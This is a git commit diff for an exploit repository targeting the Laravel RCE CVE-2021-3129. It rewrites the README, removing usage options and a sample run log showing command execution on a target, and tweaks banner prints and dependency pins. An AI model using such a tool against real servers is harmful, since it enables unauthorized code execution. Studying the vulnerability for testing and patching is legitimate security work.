feat: small fixes + new README

CVE-2021-3129.py

@@ -628,12 +628,12 @@ def validate_url(url: str) -> bool:
 
 if __name__ == "__main__":
     # Credits
-    print(f"\n{PURPLE}{BOLD}  _____   _____   ___ __ ___ _    _____ ___ ___ ")
+    print(f"{PURPLE}{BOLD}  _____   _____   ___ __ ___ _    _____ ___ ___ ")
     print(f"{PURPLE}{BOLD} / __\\ \\ / / __|_|_  )  \\_  ) |__|__ / |_  ) _ \\")
     print(f"{PURPLE}{BOLD}| (__ \\ V /| _|___/ / () / /| |___|_ \\ |/ /_,  /")
     print(f"{PURPLE}{BOLD} \\___| \\_/ |___| /___\\__/___|_|  |___/_/___|/_/ ")
-    print(f"{PURPLE}{BOLD}{UNDERLINE} https://github.com/joshuavanderpoll/CVE-2021-3129{END}")
-    print(f"{END}{PURPLE} Using PHPGGC: {UNDERLINE}https://github.com/ambionics/phpggc{END}{RED}\n")
+    print(f"{PURPLE}{BOLD} {UNDERLINE}https://github.com/joshuavanderpoll/CVE-2021-3129{END}")
+    print(f"{END}{PURPLE} Using PHPGGC: {UNDERLINE}https://github.com/ambionics/phpggc{END}\n")
 
     # Arguments
     parser = argparse.ArgumentParser(description='Exploit CVE-2021-3129 - Laravel vulnerability exploit script')

README.md

@@ -1,104 +1,57 @@
-# CVE-2021-3129 - Laravel RCE
-
-## About
-The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability.<br>
-This script allows you to write/execute commands on a website running <b>Laravel <= v8.4.2</b>, that has "APP_DEBUG" set to "true" in its ".env" file.
-
-It currently has support for <b>searching the log file</b>, <b>executing commands</b>, <b>writing to the log file</b>, and support for <b>clearing log files</b>.
-
-## Setup
+<h1 align="center">Remote Code Execution: Laravel (CVE-2021-3129)</h1>
+
+<p align="center">
+    <a href="https://visitorbadge.io/status?path=https%3A%2F%2Fgithub.com%2Fl0n3m4n%2FCVE-2024-22274-RCE">
+      <img src="https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fjoshuavanderpoll%2FCVE-2021-3129&label=Views&countColor=%2337d67a" />
+    </a>
+    <a href="https://www.python.org/">
+      <img src="https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54" alt="Python">
+    </a>
+</p>
+
+## 📜 Description 
+This script is designed to exploit the Remote Code Execution (RCE) vulnerability identified in several Laravel versions, known as CVE-2021-3129. By leveraging this vulnerability, the script allows users to write and execute commands on a target website running a vulnerable Laravel instance, provided that the "APP_DEBUG" configuration is set to "true" in the ".env" file.
+
+## 📚 Table of Contents
+- 📜 [Description](#-description)
+- 🛠️ [Installation](#-installation)
+- ⚙️ [Usage](#-usage)
+- 🐋 [Docker POC](#-docker-poc)
+- 💻 [Example](#-example)
+- 🩹 [Patch options](#-patch-options)
+- 🕵🏼 [References](#-references)
+- 📢 [Disclaimer](#disclaimer)
+
+## 🛠️ Installation
+> [!NOTE]
+> To ensure a clean and isolated environment for the project dependencies, it's recommended to use Python's venv module.
 ```bash
 $ git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git
 $ cd CVE-2021-3129
-$ pip install -r requirements.txt
-$ python3 CVE-2021-3129.py --help
-```
-
-## Options
-```bash
-   _____   _____   ___ __ ___ _    _____ ___ ___ 
-  / __\ \ / / __|_|_  )  \_  ) |__|__ / |_  ) _ \
- | (__ \ V /| _|___/ / () / /| |___|_ \ |/ /\_, /
-  \___| \_/ |___| /___\__/___|_|  |___/_/___|/_/
- https://github.com/joshuavanderpoll/CVE-2021-3129
-
-[•] Using PHPGGC: https://github.com/ambionics/phpggc
-usage: CVE-2021-3129.py [-h] [--host HOST] [--force] [--log LOG] [--ua] [--chain CHAIN] [--chains] [--php PHP] [--private-key PRIVATE_KEY]
-
-Exploit CVE-2021-3129 - Laravel vulnerability exploit script
-
-options:
-  -h, --help            show this help message and exit
-  --host HOST           Host URL to use exploit on
-  --force               Force exploit without checking if vulnerable
-  --log LOG             Full path to laravel.log file (e.g. /var/www/html/storage/logs/laravel.log)
-  --ua                  Randomize User-Agent for requests
-  --chain CHAIN         Select PHPGGC chain. Use "--chains" parameter to view all available chains.
-  --chains              View available chains for the "--chain" parameter
-  --php PHP             Path to PHP executable
-  --private-key PRIVATE_KEY
-                        Private key for patched hosts
+$ python3 -m venv .venv
+$ source .venv/bin/activate
+$ pip3 install -r requirements.txt
 ```
 
-## Patch options
-- env (Updates the .env file to set APP_DEBUG to false)
-- index (Injects code into index.php which prevents access to "/_ignition/execute-solution")
-- private (Same as the index option, but allows specific header to access "_ignition/execute-solution")
+## ⚙️ Usage
+![Usage](/assets/usage.jpg)
 
-## Docker POC
+## 🐋 Docker POC
 ```bash
 $ docker build -t laravel_vulnerable .
 $ docker run -p 8000:8000 laravel_vulnerable
 ```
 
-## Example
-```bash
-$ python3 CVE-2021-3129.py --host="http://0.0.0.0/"
-Laravel Debug Mode CVE script
-[•] Made by: https://github.com/joshuavanderpoll/CVE-2021-3129
-[•] Using PHPGGC: https://github.com/ambionics/phpggc
-[@] Starting exploit on "http://0.0.0.0/"...
-[@] Testing vulnerable URL http://0.0.0.0/_ignition/execute-solution...
-[√] Host seems vulnerable!
-[@] Searching Laravel log file path...
-[•] Laravel seems to be running on a Windows based machine.
-[√] Laravel log found: "C:\inetpub\wwwroot\Laravel_RCE_POC\storage\logs\laravel.log".
-[•] Laravel version found: "7.30.4".
-[•] Use "?" for a list of all possible actions.
-[?] Please enter a command to execute: execute whoami
-[@] Executing command "whoami"...
-[@] Generating payloads...
-[√] Generated 12 payloads.
-[@] Trying chain laravel/rce1 [1/12]...
-[@] Clearing logs...
-[@] Causing error in logs...
-[√] Caused error in logs.
-[@] Sending payloads...
-[√] Sent payload.
-[@] Converting payload...
-[√] Converted payload.
-[!] Failed execution of payload.
-Error: "file_get_contents(phar://C:\inetpub\wwwroot\Laravel_RCE_POC\storage\logs\laravel.log): failed to open stream: internal corruption of phar &amp;quot;C:\inetpub\wwwroot\Laravel_RCE_POC\storage\logs\laravel.log&amp;quot; (truncated entry)".
-[?] Do you want to try the next chain? [Y/N] : y
-...
-[@] Trying chain laravel/rce8 [6/12]...
-[@] Clearing logs...
-[@] Causing error in logs...
-[√] Caused error in logs.
-[@] Sending payloads...
-[√] Sent payload.
-[@] Converting payload...
-[√] Converted payload.
-[√] Result:
-
-autorite nt\iusr
+## 💻 Example
+![Example](/assets/example.jpg)
 
-[@] Clearing logs...
-[?] Do you want to try the next chain? [Y/N] : n
-[?] Please enter a command to execute: clear_logs
-[@] Clearing Laravel logs...
-[√] Cleared Laravel logs!
-```
+## 🩹 Patch options
+- ``env`` (Updates the .env file to set APP_DEBUG to false)
+- ``index`` (Injects code into index.php which prevents access to "/_ignition/execute-solution")
+- ``private`` (Same as the index option, but allows specific header to access "_ignition/execute-solution")
+
+## 🕵🏼 References
+- https://github.com/ambionics/phpggc
 
-## Credits
-- [PHPGGC](https://github.com/ambionics/phpggc)
+## 📢 Disclaimer
+This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.

requirements.txt

@@ -1,6 +1,6 @@
 certifi==2024.7.4
 charset-normalizer==3.3.2
 idna==3.7
-packaging==24.1
-requests==2.32.3
-urllib3==2.2.2
+packaging==24.0
+requests==2.31.0
+urllib3==2.0.7